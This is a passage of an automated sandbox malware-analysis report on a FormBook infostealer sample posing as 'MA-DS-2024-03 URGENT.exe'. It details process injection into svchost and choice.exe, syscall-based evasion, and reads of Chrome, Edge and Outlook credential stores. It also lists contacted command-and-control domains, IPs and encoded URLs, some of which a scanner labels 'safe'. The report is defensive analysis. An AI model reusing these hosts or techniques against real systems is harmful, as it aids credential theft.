                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtOpenKeyEx: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtQueryValueKey: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\choice.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\choice.exeThread register set: target process: 3724Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\choice.exeThread APC queued: target process: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2DB4008Jump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"Jump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
                Source: MA-DS-2024-03 URGENT.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: MA-DS-2024-03 URGENT.exe, fbLIkXRoMf.exe, 00000010.00000000.1676349725.0000000001810000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2503279303.0000000001811000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000000.1848401503.00000000012C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: fbLIkXRoMf.exe, 00000010.00000000.1676349725.0000000001810000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2503279303.0000000001811000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000000.1848401503.00000000012C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: fbLIkXRoMf.exe, 00000010.00000000.1676349725.0000000001810000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2503279303.0000000001811000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000000.1848401503.00000000012C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: fbLIkXRoMf.exe, 00000010.00000000.1676349725.0000000001810000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2503279303.0000000001811000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000000.1848401503.00000000012C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1775699573.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2504146589.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2504310648.0000000004220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: MA-DS-2024-03 URGENT.exeBinary or memory string: WIN_81
                Source: MA-DS-2024-03 URGENT.exeBinary or memory string: WIN_XP
                Source: MA-DS-2024-03 URGENT.exeBinary or memory string: WIN_XPe
                Source: MA-DS-2024-03 URGENT.exeBinary or memory string: WIN_VISTA
                Source: MA-DS-2024-03 URGENT.exeBinary or memory string: WIN_7
                Source: MA-DS-2024-03 URGENT.exeBinary or memory string: WIN_8
                Source: MA-DS-2024-03 URGENT.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1775699573.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2504146589.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2504310648.0000000004220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                LSASS Driver                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		1
                Taint Shared Content                		1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Service Execution                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts                		1
                LSASS Driver                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Windows Service                		1
                DLL Side-Loading                		3
                Obfuscated Files or Information                		NTDS126
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                Valid Accounts                		2
                Software Packing                		LSA Secrets251
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                Access Token Manipulation                		1
                Timestomp                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                Windows Service                		1
                DLL Side-Loading                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job412
                Process Injection                		221
                Masquerading                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                Valid Accounts                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                Virtualization/Sandbox Evasion                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                Access Token Manipulation                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task412
                Process Injection                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572587 Sample: MA-DS-2024-03 URGENT.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 44 www.snyp.shop 2->44 46 www.8312zcksnu.bond 2->46 48 5 other IPs or domains 2->48 58 Suricata IDS alerts for network traffic 2->58 60 Antivirus detection for dropped file 2->60 62 Antivirus / Scanner detection for submitted sample 2->62 64 7 other signatures 2->64 10 MA-DS-2024-03 URGENT.exe 5 2->10         started        15 AppVClient.exe 1 2->15         started        17 alg.exe 2->17         started        19 4 other processes 2->19 signatures3 process4 dnsIp5 50 pywolwnvd.biz 54.244.188.177, 49699, 80 AMAZON-02US United States 10->50 36 C:\Windows\System32\alg.exe, PE32+ 10->36 dropped 38 DiagnosticsHub.Sta...llector.Service.exe, PE32+ 10->38 dropped 40 C:\Windows\System32\AppVClient.exe, PE32+ 10->40 dropped 42 C:\Program Files (x86)\...\armsvc.exe, PE32 10->42 dropped 78 Binary is likely a compiled AutoIt script file 10->78 80 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->80 82 Writes to foreign memory regions 10->82 90 3 other signatures 10->90 21 svchost.exe 10->21         started        84 Antivirus detection for dropped file 15->84 86 Creates files in the system32 config directory 15->86 88 Machine Learning detection for dropped file 15->88 file6 signatures7 process8 signatures9 66 Maps a DLL or memory area into another process 21->66 24 fbLIkXRoMf.exe 21->24 injected process10 signatures11 68 Found direct / indirect Syscall (likely to bypass EDR) 24->68 27 choice.exe 13 24->27         started        process12 signatures13 70 Tries to steal Mail credentials (via file / registry access) 27->70 72 Tries to harvest and steal browser information (history, passwords, etc) 27->72 74 Modifies the context of a thread in another process (thread injection) 27->74 76 3 other signatures 27->76 30 fbLIkXRoMf.exe 27->30 injected 34 firefox.exe 27->34         started        process14 dnsIp15 52 d48dk.top 154.23.184.207, 49857, 49863, 49870 COGENT-174US United States 30->52 54 www.8312zcksnu.bond 38.165.29.234, 49896, 49902, 49908 COGENT-174US United States 30->54 56 2 other IPs or domains 30->56 92 Found direct / indirect Syscall (likely to bypass EDR) 30->92 signatures16

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                MA-DS-2024-03 URGENT.exe82%ReversingLabsWin32.Virus.Expiro
                MA-DS-2024-03 URGENT.exe100%AviraW32/Infector.Gen
                MA-DS-2024-03 URGENT.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                C:\Windows\System32\AppVClient.exe100%AviraW32/Infector.Gen
                C:\Windows\System32\alg.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                C:\Windows\System32\AppVClient.exe100%Joe Sandbox ML
                C:\Windows\System32\alg.exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.d48dk.top/9ffw/?66Sxjp=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&PNE=e0RPRf4HVNE0%Avira URL Cloudsafe
                http://www.8312zcksnu.bond/d3gs/?66Sxjp=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&PNE=e0RPRf4HVNE0%Avira URL Cloudsafe
                http://www.snyp.shop0%Avira URL Cloudsafe
                https://whois.gandi.net/en/results?search=sunnyz.store0%Avira URL Cloudsafe
                http://www.snyp.shop/4nyz/?66Sxjp=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&PNE=e0RPRf4HVNE0%Avira URL Cloudsafe
                http://www.d48dk.top/9ffw/0%Avira URL Cloudsafe
                http://54.244.188.177:80/usxsp0%Avira URL Cloudsafe
                http://54.244.188.177/usxspa-t0%Avira URL Cloudsafe
                http://www.8312zcksnu.bond/d3gs/0%Avira URL Cloudsafe
                http://www.snyp.shop/4nyz/0%Avira URL Cloudsafe
                http://54.244.188.177/usxsp0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                webredir.vip.gandi.net
                		217.70.184.50
                		truefalse
                  		high
                  www.snyp.shop
                  		13.248.169.48
                  		truetrue
                    		unknown
                    d48dk.top
                    		154.23.184.207
                    		truetrue
                      		unknown
                      www.8312zcksnu.bond
                      		38.165.29.234
                      		truetrue
                        		unknown
                        pywolwnvd.biz
                        		54.244.188.177
                        		truefalse
                          		high
                          www.sunnyz.store
                          		unknown
                          		unknownfalse
                            		unknown
                            www.d48dk.top
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.d48dk.top/9ffw/?66Sxjp=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&PNE=e0RPRf4HVNEtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://pywolwnvd.biz/usxspfalse
                                		high
                                http://www.snyp.shop/4nyz/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.8312zcksnu.bond/d3gs/?66Sxjp=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&PNE=e0RPRf4HVNEtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.d48dk.top/9ffw/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.8312zcksnu.bond/d3gs/true
                                • Avira URL Cloud: safe
                                		unknown
